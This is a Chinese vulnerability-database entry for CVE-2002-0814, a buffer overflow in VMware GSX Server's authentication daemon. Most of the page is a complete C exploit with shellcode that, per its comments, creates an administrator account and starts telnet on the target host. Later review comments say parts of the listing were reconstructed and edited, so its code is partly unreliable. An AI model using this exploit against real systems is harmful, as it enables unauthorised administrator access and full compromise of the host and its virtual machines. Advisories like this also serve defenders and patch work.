VMWare GSX Server验证服务远程缓冲区溢出漏洞

漏洞ID 1106871 漏洞类型 缓冲区溢出
发布时间 2002-07-24 更新时间 2005-05-02
CVE编号 CVE-2002-0814 CNNVD-ID CNNVD-200208-066
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21639
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-066
|漏洞详情
VMware GSX Server 是一款非常流行的虚拟 PC 机软件，其中包含远程访问验证服务。VMware GSX Server 的验证服务在处理 "GLOBAL" 命令时对参数长度缺少正确检查，远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。

VMware GSX Server 与 VMware Remote Console 通信时，由 VMware Authorization Service 监听 902 端口接受 VMware Remote Console 的连接；在传输数据之前需要先完成如下交互：

220 VMware Authentication Daemon Version 1.00
USER anyuser
331 Password required for user.
PASS ******
230 User user logged in.
GLOBAL server
200 Connect Global

USER、PASS、GLOBAL 命令的参数都会经过同一个长度检查：当提交的参数字符串过长（例如 500 个 "A"）时，连接会被断开，并返回类似 "599 vmware-authd PANIC: Buffer overflow in VMAuthdSocketRead()" 的消息：

220 VMware Authentication Daemon Version 1.00
USER AAAA....(A x 500)
599 vmware-authd PANIC: Buffer overflow in VMAuthdSocketRead()

但是 GLOBAL 命令在参数尚未超过该长度限制时就已经发生了溢出。溢出会导致 VMware Authorization Service 异常终止；精心构造的参数可能使攻击者以管理员权限在系统中执行任意指令。利用此漏洞需要持有一个合法的帐户。
|漏洞EXP
source: http://www.securityfocus.com/bid/5294/info

VMWare GSX Server ships with an authentication server. The server is vulnerable to a buffer overflow related to handling of the argument to the "GLOBAL" command. While attackers must be authenticated before the command can be issued, default accounts may exist. This has not been confirmed by VMWare.

This condition may be exploited to execute arbitrary code on the GSX server host. The code likely executes on the underlying, native system and may compromise the host entirely (including all virtual systems).

////////////////////////////////////////////////////////////////////
//  VMwareOverflowTest v1.0
//  Written by Zag & Glcs
//  BigBall@venustech.com.cn glcs@venustech.com.cn
//  http://www.Venustech.com
////////////////////////////////////////////////////////////////////

#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "winsock2.h"
#pragma comment (lib, "Ws2_32")

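// NOTE(review): the listing as reproduced on this page lost the line that
// declared this array. The declaration below is restored from the way
// main() uses the name (indexed writes to shellcode[133..136], strlen()
// and memcpy()); only the comment fragment "... to make sure that the
// shellcode length and GLOBAL command length not exceed the limit."
// survived, i.e. the whole GLOBAL argument must stay below the server's
// own length check (the "599 ... PANIC" response described above), so
// the payload is kept short.
//
// Per the authors' comments the payload adds a local administrator
// account x_adrc (password x_adrc) and starts the telnet service. The
// bytes at offsets 133..136 hold the absolute address of the API the
// payload calls; main() patches them per target OS. The trailing
// "\x8B\xC4\x6A\x01\x50\xB8..\xFF\xD0" presumably pushes a pointer to
// the command string and the value 1 before an indirect call -- TODO
// confirm which API that address resolves to on the target build.
//
// The payload must not contain a 0x00 byte because main() measures it
// with strlen(). This is a destructive payload: authorised testing only,
// and expect the VMware Authorization Service to crash.
unsigned char shellcode[] =
	"\x68\xC1\x15\x35\x09\x81\x2C\x24"
	"\x80\xD1\xF0\x08\x68\x63\x20\x20"
	"\x2F\x68\x5F\x61\x64\x72\x68\x72"
	"\x73\x20\x78\x68\x72\x61\x74\x6F"
	"\x68\x6E\x69\x73\x74\x68\x61\x64"
	"\x6D\x69\x68\x6F\x75\x70\x20\x68"
	"\x61\x6C\x67\x72\x68\x20\x6C\x6F"
	"\x63\x68\x26\x6E\x65\x74\x68\x74"
	"\x73\x76\x72\x68\x20\x74\x6C\x6E"
	"\x68\x74\x61\x72\x74\x68\x65\x74"
	"\x20\x73\x68\x44\x44\x26\x6E\x68"
	"\x63\x20\x2F\x41\x68\x5F\x61\x64"
	"\x72\x68\x72\x63\x20\x78\x68\x78"
	"\x5F\x61\x64\x68\x73\x65\x72\x20"
	"\x68\x65\x74\x20\x75\x68\x2F\x63"
	"\x20\x6E\x68\x63\x6D\x64\x20\x8B"
	"\xC4\x6A\x01\x50\xB8\xC6\x84\xE6"
	"\x77\xFF\xD0\x90";

// JMP ESP address (little-endian) for Windows XP, English. Addresses for
// other builds, e.g. Windows 2000, would have to be added alongside it;
// main() only knows about this one.
unsigned char Jmp_ESP_XP_Eng[] = {0x1b,0x17,0xe3,0x77};//WinXP Eng

// Address selected at run time from the <os type> argument. Exactly four
// raw bytes with no NUL terminator: copy into it with memcpy(), never
// strcpy().
unsigned char Jmp_ESP[4];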

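/*
 * Print the command-line synopsis to stdout.
 *
 * main() accepts exactly five arguments: <IP> <PORT> <username> <passwd>
 * <os type>. The only <os type> value with its own addresses is 0
 * (Windows XP, English).
 *
 * The string literal was broken across lines in the page's copy of the
 * listing; it is one literal again here (adjacent pieces concatenate).
 */
void usage (void)
{
	printf ("VMwareOverflowTest v1.0\n Written by Zag & Glcs\n "
	        "Email:BigBall@venustech.com.cn\n Glcs@venustech.com.cn\n "
	        "www.Venustech.com\n\nUsage:VMwareOverflowTest.exe <IP> <PORT> <username> "
	        "<passwd> <os type>\n\t0.Windows XP Eng\n");
}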

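/* vmware-authd answers each command with a short status line; the tool
 * reads at most this many bytes of every reply into a zeroed 4096-byte
 * buffer, so the reply is always NUL-terminated before it is printed. */
enum { REPLY_MAX = 100 };

/* Layout of the GLOBAL argument: the 7-byte "GLOBAL " prefix, then 8-byte
 * units of [90 90 58 68][JMP ESP address] placed at every offset
 * 7, 15, ..., 287, then the payload. The authors call this
 * "half-continuous covering": the exact offset of the saved return
 * address is not needed because every unit is a plausible landing point. */
enum { GLOBAL_PREFIX_LEN = 7, SLED_END = 288, SLED_UNIT = 8 };

/*
 * Entry point. Log in to the VMware Authorization Service (vmware-authd,
 * typically TCP 902) with a valid account, then send a GLOBAL command whose
 * argument overflows the service's buffer (CVE-2002-0814).
 *
 * argv: <IP> <PORT> <username> <passwd> <os type>. <os type> 0 selects the
 * Windows XP (English) addresses; any other value currently falls back to
 * the same bytes, so only that one target is really supported.
 *
 * Returns 0 once the payload has been sent (the original listing returned
 * 1 here), -1 on a Winsock or argument failure. "Sent" is all it means:
 * replies are printed but never interpreted, so a rejected login is not
 * detected.
 *
 * Authorised testing only: a valid account is required, the payload
 * creates an administrator account and starts telnet, and the service will
 * most likely crash.
 */
int main (int argc, char **argv)
{
	char str[4096];
	WSADATA wsa;
	SOCKET sock;
	struct sockaddr_in server;
	int i;

	if (argc != 6)
	{
		usage ();
		return 0;
	}
	if (WSAStartup (MAKEWORD (2, 2), &wsa) != 0)
	{
		printf ("WSAStartup error\n");
		return -1;
	}
	/* socket() failure is not checked separately: connect() on an invalid
	 * handle fails with SOCKET_ERROR and is caught below. */
	sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
	memset (&server, 0, sizeof (server));
	server.sin_family = AF_INET;
	server.sin_port = htons (atoi (argv[2]));
	server.sin_addr.s_addr = inet_addr (argv[1]);

	/* The base address of the DLLs differs between Windows builds, so both
	 * the absolute call address inside the payload (BASE_ADDRESS +
	 * FUNCTION_OFFSET, bytes 133..136) and the JMP ESP address have to be
	 * chosen per target. Which DLLs the service has loaded can be confirmed
	 * by inspecting the VMware Authorization Service process. Only Windows
	 * XP English is filled in; every other <os type> uses the same bytes. */
	switch (atoi (argv[5]))
	{
	case 0:
	default:
		shellcode[133] = 0xc6;
		shellcode[134] = 0x84;
		shellcode[135] = 0xe6;
		shellcode[136] = 0x77;
		/* Jmp_ESP_XP_Eng is four raw bytes with no NUL terminator: the
		 * original strcpy read past its end and wrote a NUL past Jmp_ESP. */
		memcpy (Jmp_ESP, Jmp_ESP_XP_Eng, sizeof (Jmp_ESP));
		break;
	}

	if (connect (sock, (struct sockaddr *)&server, sizeof (server)) == SOCKET_ERROR)
	{
		printf ("connect error\n");
		goto fail;
	}

	/* Banner, e.g. "220 VMware Authentication Daemon Version 1.00". */
	memset (str, 0, sizeof (str));
	recv (sock, str, REPLY_MAX, 0);
	printf ("%s", str);

	/* USER <name>. snprintf bounds the line, so an over-long argv[] can no
	 * longer overflow str (the original strcat did not check). */
	memset (str, 0, sizeof (str));
	if (snprintf (str, sizeof (str), "USER %s\r\n", argv[3]) >= (int) sizeof (str))
	{
		printf ("username too long\n");
		goto fail;
	}
	if (send (sock, str, (int) strlen (str), 0) == SOCKET_ERROR)
	{
		printf ("send error\n");
		goto fail;
	}
	memset (str, 0, sizeof (str));
	recv (sock, str, REPLY_MAX, 0);
	printf ("%s", str);

	/* PASS <password>. */
	memset (str, 0, sizeof (str));
	if (snprintf (str, sizeof (str), "PASS %s\r\n", argv[4]) >= (int) sizeof (str))
	{
		printf ("password too long\n");
		goto fail;
	}
	if (send (sock, str, (int) strlen (str), 0) == SOCKET_ERROR)
	{
		printf ("send error\n");
		goto fail;
	}
	memset (str, 0, sizeof (str));
	recv (sock, str, REPLY_MAX, 0);
	printf ("%s", str);

	/* GLOBAL <overflow string>. */
	memset (str, 0, sizeof (str));
	strcpy (str, "GLOBAL ");
	for (i = GLOBAL_PREFIX_LEN; i < SLED_END; i += SLED_UNIT)
	{
		/* nop; nop; pop eax; push <JMP ESP address>: the address lands on
		 * every 8-byte unit, so whichever unit overwrites the saved return
		 * address redirects execution into the sled. */
		memcpy (str + i, "\x90\x90\x58\x68", 4);
		memcpy (str + i + 4, Jmp_ESP, 4);
	}
	/* The loop leaves i just past the last unit (295). The payload follows
	 * there, measured with strlen(), so it must not contain a 0x00 byte;
	 * the total stays far inside str and below the server's own length
	 * check on the argument. */
	memcpy (str + i, shellcode, strlen ((const char *) shellcode));
	strcat (str, "\r\n");
	if (send (sock, str, (int) strlen (str), 0) == SOCKET_ERROR)
	{
		printf ("send error\n");
		goto fail;
	}
	printf ("Done!\n");
	closesocket (sock);
	WSACleanup ();
	return 0;

fail:
	closesocket (sock);
	WSACleanup ();
	return -1;
}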
|参考资料

来源:BUGTRAQ
名称:20020726Re:VMwareGSXServerRemoteBufferOverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102765223418716&w=2
来源:www.vmware.com
链接:http://www.vmware.com/download/gsx_security.html
来源:BUGTRAQ
名称:20020724VMwareGSXServerRemoteBufferOverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=102752511030425&w=2
来源:BID
名称:5294
链接:http://www.securityfocus.com/bid/5294
来源:XF
名称:vmware-gsx-auth-bo(9663)
链接:http://www.iss.net/security_center/static/9663.php
来源:NTBUGTRAQ
名称:20020805VMwareGSXServer2.0.1ReleaseandSecurityAlert
链接:http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0057.html